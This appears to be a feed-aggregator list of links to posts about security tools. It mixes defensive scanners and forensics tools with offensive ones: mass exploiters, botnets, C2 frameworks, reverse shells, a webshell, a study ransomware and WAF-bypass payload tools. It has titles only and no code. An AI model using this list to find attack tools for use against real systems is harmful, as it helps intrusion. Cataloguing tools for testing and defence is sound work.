- [Metasploit 5.0 - The World’s Most Used Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html)
- [Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support](http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html)
- [Twifo-Cli - Get User Information Of A Twitter User](http://feedproxy.google.com/~r/PentestTools/~3/Sbc3gunRkBE/twifo-cli-get-user-information-of.html)
- [Sitadel - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html)
- [Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)](http://feedproxy.google.com/~r/PentestTools/~3/MV1mlXFmkpg/pe-sieve-recognizes-and-dumps-variety.html)
- [Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To](http://feedproxy.google.com/~r/PentestTools/~3/sZXmRx1pB7E/malboxes-builds-malware-analysis.html)
- [Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies](http://feedproxy.google.com/~r/PentestTools/~3/elMWRHLI054/snyk-cli-and-build-time-tool-to-find.html)
- [Shed - .NET Runtime Inspector](http://feedproxy.google.com/~r/PentestTools/~3/byWGTLrRRMA/shed-net-runtime-inspector.html)
- [Stardox - Github Stargazers Information Gathering Tool](http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html)
- [Commix v2.7 - Automated All-in-One OS Command Injection And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html)
- [AutoSploit v3.0 - Automated Mass Exploiter](http://feedproxy.google.com/~r/PentestTools/~3/nDoUfG2uHQg/autosploit-v30-automated-mass-exploiter.html)
- [Faraday v3.5 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/Fq1vFkcIIFI/faraday-v35-collaborative-penetration.html)
- [Recaf - A Modern Java Bytecode Editor](http://feedproxy.google.com/~r/PentestTools/~3/mAzq3GzpHIg/recaf-modern-java-bytecode-editor.html)
- [dnSpy - .NET Debugger And Assembly Editor](http://feedproxy.google.com/~r/PentestTools/~3/JZaPW594CQE/dnspy-net-debugger-and-assembly-editor.html)
- [Trivy - A Simple And Comprehensive Vulnerability Scanner For Containers, Suitable For CI](http://feedproxy.google.com/~r/PentestTools/~3/ZK8L_dyPB-w/trivy-simple-and-comprehensive.html)
- [Mallory - HTTP/HTTPS Proxy Over SSH](http://feedproxy.google.com/~r/PentestTools/~3/h2nFKV6dnt4/mallory-httphttps-proxy-over-ssh.html)
- [ezXSS - An Easy Way For Penetration Testers And Bug Bounty Hunters To Test (Blind) Cross Site Scripting](http://feedproxy.google.com/~r/PentestTools/~3/n-Cg7j_L4NQ/ezxss-easy-way-for-penetration-testers.html)
- [Uptux - Linux Privilege Escalation Checks (Systemd, Dbus, Socket Fun, Etc)](http://feedproxy.google.com/~r/PentestTools/~3/ZgBQcJdnfNY/uptux-linux-privilege-escalation-checks.html)
- [Fail2Ban - Daemon To Ban Hosts That Cause Multiple Authentication Errors](http://feedproxy.google.com/~r/PentestTools/~3/D5gLh71-uWg/fail2ban-daemon-to-ban-hosts-that-cause.html)
- [Dr. Memory - Memory Debugger For Windows, Linux, Mac, And Android](http://feedproxy.google.com/~r/PentestTools/~3/2A801pnMhqk/dr-memory-memory-debugger-for-windows.html)
- [Gosec - Golang Security Checker](http://feedproxy.google.com/~r/PentestTools/~3/WuzDvGt1kDg/gosec-golang-security-checker.html)
- [Virtuailor - IDAPython Tool For Creating Automatic C++ Virtual Tables In IDA Pro](http://feedproxy.google.com/~r/PentestTools/~3/gsx4a5OK-50/virtuailor-idapython-tool-for-creating.html)
- [AtomShields Cli - Security Testing Framework For Repositories And Source Code](http://feedproxy.google.com/~r/PentestTools/~3/j4suirYVDqs/atomshields-cli-security-testing.html)
- [PESTO - PE (files) Statistical Tool](http://feedproxy.google.com/~r/PentestTools/~3/o2cOlnSNzgI/pesto-pe-files-statistical-tool.html)
- [UBoat - HTTP Botnet Project](http://feedproxy.google.com/~r/PentestTools/~3/WSeYtomPlJ8/uboat-http-botnet-project.html)
- [ThreatIngestor - Extract And Aggregate Threat Intelligence](http://feedproxy.google.com/~r/PentestTools/~3/j6kfQRbcuB4/threatingestor-extract-and-aggregate.html)
- [Pockint - A Portable OSINT Swiss Army Knife For DFIR/OSINT Professionals](http://feedproxy.google.com/~r/PentestTools/~3/PPTOd2c6RDA/pockint-portable-osint-swiss-army-knife.html)
- [LinPwn - Interactive Post Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/bewtEc2_F7w/linpwn-interactive-post-exploitation.html)
- [XORpass - Encoder To Bypass WAF Filters Using XOR Operations](http://feedproxy.google.com/~r/PentestTools/~3/png3xyIaqJs/xorpass-encoder-to-bypass-waf-filters.html)
- [CloudUnflare - Reconnaissance Real IP Address For Cloudflare Bypass](http://feedproxy.google.com/~r/PentestTools/~3/uOiN58lJSW0/cloudunflare-reconnaissance-real-ip.html)
- [Cryptovenom - The Cryptography Swiss Army Knife](http://feedproxy.google.com/~r/PentestTools/~3/zjxbWl4WCwY/cryptovenom-cryptography-swiss-army.html)
- [Tor Browser v9.0 - Everything you Need to Safely Browse the Internet](http://feedproxy.google.com/~r/PentestTools/~3/d68Ou81lxVA/tor-browser-v90-everything-you-need-to.html)
- [AutoSploit v4.0 - Automated Mass Exploiter](http://feedproxy.google.com/~r/PentestTools/~3/6Y1RrDCOjls/autosploit-v40-automated-mass-exploiter.html)
- [Tails 4.0 - Live System to Preserve Your Privacy and Anonymity](http://feedproxy.google.com/~r/PentestTools/~3/YFfBEc4idTE/tails-40-live-system-to-preserve-your.html)
- [ATTACKdatamap - A Datasource Assessment On An Event Level To Show Potential Coverage Or The MITRE ATT&CK Framework](http://feedproxy.google.com/~r/PentestTools/~3/F-ohXtIc9vU/attackdatamap-datasource-assessment-on.html)
- [JSONBee - A Ready To Use JSONP Endpoints/Payloads To Help Bypass Content Security Policy Of Different Websites](http://feedproxy.google.com/~r/PentestTools/~3/fkO6wAzdumU/jsonbee-ready-to-use-jsonp.html)
- [Arjun v1.6 - HTTP Parameter Discovery Suite](http://feedproxy.google.com/~r/PentestTools/~3/7DM5VIonrMM/arjun-v16-http-parameter-discovery-suite.html)
- [HomePwn - Swiss Army Knife for Pentesting of IoT Devices](http://feedproxy.google.com/~r/PentestTools/~3/nMwihlR0QFM/homepwn-swiss-army-knife-for-pentesting.html)
- [Femida - Automated Blind-Xss Search For Burp Suite](http://feedproxy.google.com/~r/PentestTools/~3/hcIniCfTwFk/femida-automated-blind-xss-search-for.html)
- [Slither v0.6.7 - Static Analyzer For Solidity](http://feedproxy.google.com/~r/PentestTools/~3/vb_PZS9dudM/slither-v067-static-analyzer-for.html)
- [AutoMacTC - Automated Mac Forensic Triage Collector](http://feedproxy.google.com/~r/PentestTools/~3/todwtrFFW70/automactc-automated-mac-forensic-triage.html)
- [Password Lense - Reveal Character Types In A Password](http://feedproxy.google.com/~r/PentestTools/~3/saysdQ-Pmq0/password-lense-reveal-character-types.html)
- [Osmedeus v2.1 - Fully Automated Offensive Security Framework For Reconnaissance And Vulnerability Scanning](http://feedproxy.google.com/~r/PentestTools/~3/TAqtz2izPm4/osmedeus-v21-fully-automated-offensive.html)
- [Snare - Super Next Generation Advanced Reactive honEypot](http://feedproxy.google.com/~r/PentestTools/~3/etMMshJWTjI/snare-super-next-generation-advanced.html)
- [UAC-A-Mola - Tool That Allows Security Researchers To Investigate New UAC Bypasses, In Addition To Detecting And Exploiting Known Bypasses](http://feedproxy.google.com/~r/PentestTools/~3/I342cozrCls/uac-mola-tool-that-allows-security.html)
- [SUID3NUM - A Script Which Utilizes Python'S Built-In Modules To Find SUID Bins, Separate Default Bins From Custom Bins, Cross-Match Those With Bins In GTFO Bin's Repository & Auto-Exploit Those](http://feedproxy.google.com/~r/PentestTools/~3/5a7jOsS9bX8/suid3num-script-which-utilizes-pythons.html)
- [FOCA - Tool To Find Metadata And Hidden Information In The Documents](http://feedproxy.google.com/~r/PentestTools/~3/nFwHd45s92A/foca-tool-to-find-metadata-and-hidden.html)
- [IoT-Implant-Toolkit - Toolkit For Implant Attack Of IoT Devices](http://feedproxy.google.com/~r/PentestTools/~3/3OB50NG0vmM/iot-implant-toolkit-toolkit-for-implant.html)
- [Discover - Custom Bash Scripts Used To Automate Various Penetration Testing Tasks Including Recon, Scanning, Parsing, And Creating Malicious Payloads And Listeners With Metasploit](http://feedproxy.google.com/~r/PentestTools/~3/cO3SnhytyUU/discover-custom-bash-scripts-used-to.html)
- [Rbuster - Yet Another Dirbuster](http://feedproxy.google.com/~r/PentestTools/~3/kNQvOukex84/rbuster-yet-another-dirbuster.html)
- [XMLRPC Bruteforcer - An XMLRPC Brute Forcer Targeting Wordpress](http://feedproxy.google.com/~r/PentestTools/~3/y9o5Z506UHA/xmlrpc-bruteforcer-xmlrpc-brute-forcer.html)
- [Dirstalk - Modern Alternative To Dirbuster/Dirb](http://feedproxy.google.com/~r/PentestTools/~3/NCz0l6NC_Jc/dirstalk-modern-alternative-to.html)
- [Cotopaxi - Set Of Tools For Security Testing Of Internet Of Things Devices Using Specific Network IoT Protocols](http://feedproxy.google.com/~r/PentestTools/~3/awVpNshtexM/cotopaxi-set-of-tools-for-security.html)
- [Auto Re - IDA PRO Auto-Renaming Plugin With Tagging Support](http://feedproxy.google.com/~r/PentestTools/~3/qTj73V0ew0g/auto-re-ida-pro-auto-renaming-plugin.html)
- [Gobuster v3.0 - Directory/File, DNS And VHost Busting Tool Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/nkK1LNxKpg0/gobuster-v30-directoryfile-dns-and.html)
- [RITA - Real Intelligence Threat Analytics](http://feedproxy.google.com/~r/PentestTools/~3/1mCFWIgo0r0/rita-real-intelligence-threat-analytics.html)
- [Eaphammer v1.9.0 - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks](http://feedproxy.google.com/~r/PentestTools/~3/sZn-5FG2wTo/eaphammer-v190-targeted-evil-twin.html)
- [Postenum - A Clean, Nice And Easy Tool For Basic/Advanced Privilege Escalation Techniques](http://feedproxy.google.com/~r/PentestTools/~3/GpewdzubbZ4/postenum-clean-nice-and-easy-tool-for.html)
- [Unicorn-Bios - Basic BIOS Emulator For Unicorn Engine](http://feedproxy.google.com/~r/PentestTools/~3/a1iJIC1mmaw/unicorn-bios-basic-bios-emulator-for.html)
- [uniFuzzer - A Fuzzing Tool For Closed-Source Binaries Based On Unicorn And LibFuzzer](http://feedproxy.google.com/~r/PentestTools/~3/90UMwndvcfU/unifuzzer-fuzzing-tool-for-closed.html)
- [SMTPTester - Tool To Check Common Vulnerabilities In SMTP Servers](http://feedproxy.google.com/~r/PentestTools/~3/X1SMXv14Vws/smtptester-tool-to-check-common.html)
- [Tylium - Primary Data Pipelines For Intrusion Detection, Security Analytics And Threat Hunting](http://feedproxy.google.com/~r/PentestTools/~3/KvK02H46LgM/tylium-primary-data-pipelines-for.html)
- [Fsmon - Monitor Filesystem On iOS / OS X / Android / FirefoxOS / Linux](http://feedproxy.google.com/~r/PentestTools/~3/JWYXGMKRJYw/fsmon-monitor-filesystem-on-ios-os-x.html)
- [Traxss - Automated XSS Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/xvXQMTg3IlU/traxss-automated-xss-vulnerability.html)
- [DECAF - Short for Dynamic Executable Code Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/rkeyV1Wsm7M/decaf-short-for-dynamic-executable-code.html)
- [Mosca - Manual Search Tool To Find Bugs Like A Grep Unix Command](http://feedproxy.google.com/~r/PentestTools/~3/CoPKt-KlvsQ/mosca-manual-search-tool-to-find-bugs.html)
- [MalConfScan - Volatility Plugin For Extracts Configuration Data Of Known Malware](http://feedproxy.google.com/~r/PentestTools/~3/GUzlXxFr0Js/malconfscan-volatility-plugin-for.html)
- [Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit](http://feedproxy.google.com/~r/PentestTools/~3/ms23O5DiiEQ/ispy-eternalblue-ms17-010-bluekeep-cve.html)
- [Zeek - A Powerful Network Analysis Framework That Is Much Different From The Typical IDS You May Know](http://feedproxy.google.com/~r/PentestTools/~3/KPDGs0NRmsQ/zeek-powerful-network-analysis.html)
- [Maryam - Open-source intelligence (OSINT) Framework](http://feedproxy.google.com/~r/PentestTools/~3/BQ1U6qzZrN8/maryam-open-source-intelligence-osint.html)
- [box.js - A Tool For Studying JavaScript Malware](http://feedproxy.google.com/~r/PentestTools/~3/4rzpnIcLF6s/boxjs-tool-for-studying-javascript.html)
- [FATT - A Script For Extracting Network Metadata And Fingerprints From Pcap Files And Live Network Traffic](http://feedproxy.google.com/~r/PentestTools/~3/wHgG3GSXPuM/fatt-script-for-extracting-network.html)
- [Penta - Open Source All-In-One CLI Tool To Automate Pentesting](http://feedproxy.google.com/~r/PentestTools/~3/VeXiUW5MKuE/penta-open-source-all-in-one-cli-tool.html)
- [Tarnish - A Chrome Extension Static Analysis Tool To Help Aide In Security Reviews](http://feedproxy.google.com/~r/PentestTools/~3/RarYsz_39qA/tarnish-chrome-extension-static.html)
- [B2R2 - Collection Of Useful Algorithms, Functions, And Tools For Binary Analysis](http://feedproxy.google.com/~r/PentestTools/~3/Q15IlaLOCx4/b2r2-collection-of-useful-algorithms.html)
- [Userrecon-Py v2.0 - Username Recognition On Various Websites](http://feedproxy.google.com/~r/PentestTools/~3/c7uPNvH8iLk/userrecon-py-v20-username-recognition.html)
- [DNS Rebinding Tool - DNS Rebind Tool With Custom Scripts](http://feedproxy.google.com/~r/PentestTools/~3/VG7fx5Ahuus/dns-rebinding-tool-dns-rebind-tool-with.html)
- [Fenrir - Simple Bash IOC Scanner](http://feedproxy.google.com/~r/PentestTools/~3/DEXbxuZxHic/fenrir-simple-bash-ioc-scanner.html)
- [ManaTI - A Web-Based Tool To Assist The Work Of The Intuitive Threat Analysts](http://feedproxy.google.com/~r/PentestTools/~3/magp9lq1V9s/manati-web-based-tool-to-assist-work-of.html)
- [ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shellcode Into A Standard Win32 Application](http://feedproxy.google.com/~r/PentestTools/~3/FC6jn8Q6_LQ/threadboat-program-uses-thread.html)
- [SQLMap v1.3.10 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/k-Bb_83QO6w/sqlmap-v1310-automatic-sql-injection.html)
- [GiveMeSecrets - Use Regular Expressions To Get Sensitive Information From A Given Repository (GitHub, Pip Or Npm)](http://feedproxy.google.com/~r/PentestTools/~3/rm2q3lUr-Xs/givemesecrets-use-regular-expressions.html)
- [Lockdoor Framework - A Penetration Testing Framework With Cyber Security Resources](http://feedproxy.google.com/~r/PentestTools/~3/v3rNXWornZ4/lockdoor-framework-penetration-testing.html)
- [Sub.Sh - Online Subdomain Detect Script](http://feedproxy.google.com/~r/PentestTools/~3/Qe8yZPMMNjk/subsh-online-subdomain-detect-script.html)
- [CryptonDie - A Ransomware Developed For Study Purposes](http://feedproxy.google.com/~r/PentestTools/~3/Z0YkIrBUmbw/cryptondie-ransomware-developed-for.html)
- [Recomposer - Randomly Changes Win32/64 PE Files For 'Safer' Uploading To Malware And Sandbox Sites](http://feedproxy.google.com/~r/PentestTools/~3/gVroQADJHWg/recomposer-randomly-changes-win3264-pe.html)
- [Terraform AWS Secure Baseline - Terraform Module To Set Up Your AWS Account With The Secure Baseline Configuration Based On CIS Amazon Web Services Foundations](http://feedproxy.google.com/~r/PentestTools/~3/kpRIN1tO0m8/terraform-aws-secure-baseline-terraform.html)
- [Syhunt Community 6.7 - Web And Mobile Application Scanner](http://feedproxy.google.com/~r/PentestTools/~3/LCuYj1U9fus/syhunt-community-67-web-and-mobile.html)
- [DumpsterFire - "Security Incidents In A Box!" A Modular, Menu-Driven, Cross-Platform Tool For Building Customized, Time-Delayed, Distributed Security Events](http://feedproxy.google.com/~r/PentestTools/~3/KauwkR-GgKM/dumpsterfire-security-incidents-in-box.html)
- [SecurityNotFound - 404 Page Not Found Webshell](http://feedproxy.google.com/~r/PentestTools/~3/vYxGFxKr0f8/securitynotfound-404-page-not-found.html)
- [HRShell - An Advanced HTTPS/HTTP Reverse Shell Built With Flask](http://feedproxy.google.com/~r/PentestTools/~3/2EnZI5d4-lM/hrshell-advanced-httpshttp-reverse.html)
- [Kube-Alien - Tool To Launches Attack on K8s Cluster from Within](http://feedproxy.google.com/~r/PentestTools/~3/126-Y9dJKbU/kube-alien-tool-to-launches-attack-on.html)
- [Rebel-Framework - Advanced And Easy To Use Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/fMlj6cBpiT8/rebel-framework-advanced-and-easy-to.html)
- [FDsploit - File Inclusion And Directory Traversal Fuzzing, Enumeration & Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/swcjIuLy9bI/fdsploit-file-inclusion-and-directory.html)
- [MemProcFS - The Memory Process File System](http://feedproxy.google.com/~r/PentestTools/~3/PEKPsbwM4CQ/memprocfs-memory-process-file-system.html)
- [Flare-Emu - Powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers](http://feedproxy.google.com/~r/PentestTools/~3/GIxOIe09LhY/flare-emu-powered-by-ida-pro-and.html)
- [Firmware Analysis Toolkit - Toolkit To Emulate Firmware And Analyse It For Security Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/Xo17q88fwaU/firmware-analysis-toolkit-toolkit-to.html)
- [Router Exploit Shovel - Automated Application Generation For Stack Overflow Types On Wireless Routers](http://feedproxy.google.com/~r/PentestTools/~3/Umzv8g_UhHo/router-exploit-shovel-automated.html)
- [Tachyon - Fast HTTP Dead File Finder](http://feedproxy.google.com/~r/PentestTools/~3/9WifBwMiBZM/tachyon-fast-http-dead-file-finder.html)
- [SKA - Simple Karma Attack](http://feedproxy.google.com/~r/PentestTools/~3/qvHCBNmDLuQ/ska-simple-karma-attack.html)
- [ArmourBird CSF - Container Security Framework](http://feedproxy.google.com/~r/PentestTools/~3/QrsSVDyTOII/armourbird-csf-container-security.html)
- [Juicy Potato - A Sugared Version Of RottenPotatoNG, With A Bit Of Juice, I.E. Another Local Privilege Escalation Tool, From A Windows Service Accounts To NT AUTHORITY\SYSTEM](http://feedproxy.google.com/~r/PentestTools/~3/v__5K9CLmi0/juicy-potato-sugared-version-of.html)
- [ScoutSuite - Multi-Cloud Security Auditing Tool](http://feedproxy.google.com/~r/PentestTools/~3/8lNYafWTzcI/scoutsuite-multi-cloud-security.html)
- [Mitaka - A Browser Extension For OSINT Search](http://feedproxy.google.com/~r/PentestTools/~3/qozOsKsK1eg/mitaka-browser-extension-for-osint.html)
- [Kirjuri - Web Application For Managing Cases And Physical Forensic Evidence Items](http://feedproxy.google.com/~r/PentestTools/~3/lV-7cdaZCvc/kirjuri-web-application-for-managing.html)
- [SysAnalyzer - Automated Malcode Analysis System](http://feedproxy.google.com/~r/PentestTools/~3/VTx0yw7qoek/sysanalyzer-automated-malcode-analysis.html)
- [Pixload - Image Payload Creating/Injecting Tools](http://feedproxy.google.com/~r/PentestTools/~3/GNB4ABZwyJ4/pixload-image-payload-creatinginjecting.html)
- [Dolos Cloak - Automated 802.1X Bypass](http://feedproxy.google.com/~r/PentestTools/~3/NG6IUvbjPjA/dolos-cloak-automated-8021x-bypass.html)
- [Dr. ROBOT - Tool To Enumerate The Subdomains Associated With A Company By Aggregating The Results Of Multiple OSINT Tools](http://feedproxy.google.com/~r/PentestTools/~3/LF5qGGBamj8/dr-robot-tool-to-enumerate-subdomains.html)
- [FudgeC2 - A Collaborative C2 Framework For Purple-Teaming Written In Python3, Powershell And .NET](http://feedproxy.google.com/~r/PentestTools/~3/Hxs0DfO56As/fudgec2-collaborative-c2-framework-for.html)
- [Aura-Botnet - A Super Portable Botnet Framework With A Django-based C2 Server](http://feedproxy.google.com/~r/PentestTools/~3/tnSSVf5KKxM/aura-botnet-super-portable-botnet.html)
- [Project iKy v2.2.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/UUzvzCFnYJE/project-iky-v220-tool-that-collects.html)
- [Stardox - Github Stargazers Information Gathering Tool](http://feedproxy.google.com/~r/PentestTools/~3/7By7ThSuewU/stardox-github-stargazers-information.html)
- [ACT Platform - Open Platform For Collection And Exchange Of Threat Intelligence Information](http://feedproxy.google.com/~r/PentestTools/~3/LuwNP1Fp5wI/act-platform-open-platform-for.html)
- [PrivExchange - Exchange Your Privileges For Domain Admin Privs By Abusing Exchange](http://feedproxy.google.com/~r/PentestTools/~3/chTatA-U6pE/privexchange-exchange-your-privileges.html)
- [PostShell - Post Exploitation Bind/Backconnect Shell](http://feedproxy.google.com/~r/PentestTools/~3/bA3vPoaomGE/postshell-post-exploitation.html)
- [TinkererShell - A Simple Python Reverse Shell Written Just For Fun](http://feedproxy.google.com/~r/PentestTools/~3/20a4IaX7icM/tinkerershell-simple-python-reverse.html)
- [Stegify - Go Tool For LSB Steganography, Capable Of Hiding Any File Within An Image](http://feedproxy.google.com/~r/PentestTools/~3/l2fNzJLNH5Q/stegify-go-tool-for-lsb-steganography.html)
- [DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User](http://feedproxy.google.com/~r/PentestTools/~3/15LHL1qcszo/detexploit-software-that-detect.html)
- [Shodan-Eye - Tool That Collects All The Information About All Devices Directly Connected To The Internet Using The Specified Keywords That You Enter](http://feedproxy.google.com/~r/PentestTools/~3/RXQ8g-gjkvE/shodan-eye-tool-that-collects-all.html)
- [Anteater - CI/CD Gate Check Framework](http://feedproxy.google.com/~r/PentestTools/~3/CmExmYQNlOA/anteater-cicd-gate-check-framework.html)
- [Pyrdp - RDP Man-In-The-Middle And Library For Python3 With The Ability To Watch Connections Live Or After The Fact](http://feedproxy.google.com/~r/PentestTools/~3/5V_LwIOI6AM/pyrdp-rdp-man-in-middle-and-library-for.html)
- [Grapl - Graph Platform For Detection And Response](http://feedproxy.google.com/~r/PentestTools/~3/Nzu7nTXFHhk/grapl-graph-platform-for-detection-and.html)
- [Metame - Metame Is A Metamorphic Code Engine For Arbitrary Executables](http://feedproxy.google.com/~r/PentestTools/~3/UtLiReewVn4/metame-metame-is-metamorphic-code.html)
- [Botb - A Container Analysis And Exploitation Tool For Pentesters And Engineers](http://feedproxy.google.com/~r/PentestTools/~3/LQR_lITEKlY/botb-container-analysis-and.html)
- [gitGraber - Tool To Monitor GitHub To Search And Find Sensitive Data For Different Online Services Such As: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...](http://feedproxy.google.com/~r/PentestTools/~3/j4Ms9uZ-OTY/gitgraber-tool-to-monitor-github-to.html)
- [fileGPS - A Tool That Help You To Guess How Your Shell Was Renamed After The Server-Side Script Of The File Uploader Saved It](http://feedproxy.google.com/~r/PentestTools/~3/W3dhPrLX2-w/filegps-tool-that-help-you-to-guess-how.html)
- [ActiveReign - A Network Enumeration And Attack Toolset](http://feedproxy.google.com/~r/PentestTools/~3/hFVVCal6VKM/activereign-network-enumeration-and.html)
- [Revshellgen - Reverse Shell Generator Written In Python.](http://feedproxy.google.com/~r/PentestTools/~3/JLfejTy8AAo/revshellgen-reverse-shell-generator.html)
- [LetsMapYourNetwork - Tool To Visualise Your Physical Network In Form Of Graph With Zero Manual Error](http://feedproxy.google.com/~r/PentestTools/~3/VZ1e-sVffQI/letsmapyournetwork-tool-to-visualise.html)
- [OpenCTI - Open Cyber Threat Intelligence Platform](http://feedproxy.google.com/~r/PentestTools/~3/kvGSXsf0WFo/opencti-open-cyber-threat-intelligence.html)
- [BlackArch Linux v2019.09.01 - Penetration Testing Distribution](http://feedproxy.google.com/~r/PentestTools/~3/PQen0TZFLxI/blackarch-linux-v20190901-penetration.html)
- [Phishing-Simulation - Aims To Increase Phishing Awareness By Providing An Intuitive Tutorial And Customized Assessment](http://feedproxy.google.com/~r/PentestTools/~3/-hbGrpX44oM/phishing-simulation-aims-to-increase.html)
- [PingCastle - Get Active Directory Security At 80% In 20% Of The Time](http://feedproxy.google.com/~r/PentestTools/~3/6TeOKlPbhVc/pingcastle-get-active-directory.html)
- [Mondoo - Cloud-Native Security And Vulnerability Risk Management](http://feedproxy.google.com/~r/PentestTools/~3/414GCSMOF5M/mondoo-cloud-native-security-and.html)
- [BLUESPAWN - Windows Based Active Defense Tool To Empower Blue Teams](http://feedproxy.google.com/~r/PentestTools/~3/RmNxNQGa_EU/bluespawn-windows-based-active-defense.html)
- [EMAGNET - Tool For Find Leaked Databases With 97.1% Accurate To Grab Mail + Password Together From Pastebin Leaks](http://feedproxy.google.com/~r/PentestTools/~3/YIAfk2yhMRY/emagnet-tool-for-find-leaked-databases.html)
- [PyFuscation - Obfuscate Powershell Scripts By Replacing Function Names, Variables And Parameters](http://feedproxy.google.com/~r/PentestTools/~3/2_LXfCG2LUA/pyfuscation-obfuscate-powershell.html)
- [Btlejack - Bluetooth Low Energy Swiss-army Knife](http://feedproxy.google.com/~r/PentestTools/~3/gTLsCVExzTE/btlejack-bluetooth-low-energy-swiss.html)
- [mpDNS - Multi-Purpose DNS Server](http://feedproxy.google.com/~r/PentestTools/~3/f-YDWCOZkiI/mpdns-multi-purpose-dns-server.html)
- [Ehtools - Framework Of Serious Wi-Fi Penetration Tools](http://feedproxy.google.com/~r/PentestTools/~3/Nj2ggxc-tFY/ehtools-framework-of-serious-wi-fi.html)
- [Wordlister - A Simple Wordlist Generator And Mangler Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/jdNG6fQGKNs/wordlister-simple-wordlist-generator.html)
- [Barq - The AWS Cloud Post Exploitation Framework!](http://feedproxy.google.com/~r/PentestTools/~3/Zz0dxpUW4lc/barq-aws-cloud-post-exploitation.html)
- [Telegram C# C2 - A Command and Control Tool for Telegram Bot Communication](http://feedproxy.google.com/~r/PentestTools/~3/xXizEoJzSSo/telegram-c-c2-command-and-control-tool.html)
- [HTTP Request Smuggler - Extension For Burp Suite Designed To Help You Launch HTTP Request Smuggling Attacks](http://feedproxy.google.com/~r/PentestTools/~3/YMARKd6NylA/http-request-smuggler-extension-for.html)
- [B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF](http://feedproxy.google.com/~r/PentestTools/~3/f0rtJh2UVH4/b-xssrf-toolkit-to-detect-and-keep.html)
- [0xsp Mongoose v1.7 - Linux/Windows Privilege Escalation intelligent Enumeration Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/hf85UAI5b8Q/0xsp-mongoose-v17-linuxwindows.html)
- [Constellation - A Graph-Focused Data Visualisation And Interactive Analysis Application](http://feedproxy.google.com/~r/PentestTools/~3/Nzawsf4moWA/constellation-graph-focused-data.html)
- [Hashcatch - Capture Handshakes Of Nearby WiFi Networks Automatically](http://feedproxy.google.com/~r/PentestTools/~3/XDNJFnpc33w/hashcatch-capture-handshakes-of-nearby.html)
- [Nuages - A Modular C2 Framework](http://feedproxy.google.com/~r/PentestTools/~3/jvENRRXLO3Y/nuages-modular-c2-framework.html)
- [RedHunt OS v2 - Virtual Machine For Adversary Emulation And Threat Hunting](http://feedproxy.google.com/~r/PentestTools/~3/9CtJ2lp2pHw/redhunt-os-v2-virtual-machine-for.html)
- [Sudomy - Subdomain Enumeration & Analysis](http://feedproxy.google.com/~r/PentestTools/~3/mkilVC-4keE/sudomy-subdomain-enumeration-analysis.html)
- [NebulousAD - Automated Credential Auditing Tool](http://feedproxy.google.com/~r/PentestTools/~3/bTHHdRrAYEk/nebulousad-automated-credential.html)
- [PHPStan - PHP Static Analysis Tool (Discover Bugs In Your Code Without Running It!)](http://feedproxy.google.com/~r/PentestTools/~3/A-rMwI9lboA/phpstan-php-static-analysis-tool.html)
- [EVABS - Extremely Vulnerable Android Labs](http://feedproxy.google.com/~r/PentestTools/~3/WaMsoBOGlrA/evabs-extremely-vulnerable-android-labs.html)
- [4CAN - Open Source Security Tool to Find Security Vulnerabilities in Modern Cars](http://feedproxy.google.com/~r/PentestTools/~3/Hpal2tcA9oc/4can-open-source-security-tool-to-find.html)
- [AIL Framework - Framework for Analysis of Information Leaks](http://feedproxy.google.com/~r/PentestTools/~3/91FEC7M0yz8/ail-framework-framework-for-analysis-of.html)
- [Airgeddon v9.21 - A Multi-use Bash Script for Linux Systems to Audit Wireless Networ](http://feedproxy.google.com/~r/PentestTools/~3/lUMA75AQNOk/airgeddon-v921-multi-use-bash-script.html)
- [Sublert - Security And Reconnaissance Tool Which Leverages Certificate Transparency To Automatically Monitor New Subdomains Deployed By Specific Organizations And Issued TLS/SSL Certificate](http://feedproxy.google.com/~r/PentestTools/~3/AGTDH5ASc-U/sublert-security-and-reconnaissance.html)
- [IPRotate - Extension For Burp Suite Which Uses AWS API Gateway To Rotate Your IP On Every Request](http://feedproxy.google.com/~r/PentestTools/~3/t5h8C83KVMM/iprotate-extension-for-burp-suite-which.html)
- [LDAPDomainDump - Active Directory Information Dumper Via LDAP](http://feedproxy.google.com/~r/PentestTools/~3/NVmrl3qPNRU/ldapdomaindump-active-directory.html)
- [Covenant - A .NET Command And Control Framework For Red Teamers](http://feedproxy.google.com/~r/PentestTools/~3/FRnRVXGYQT8/covenant-net-command-and-control.html)
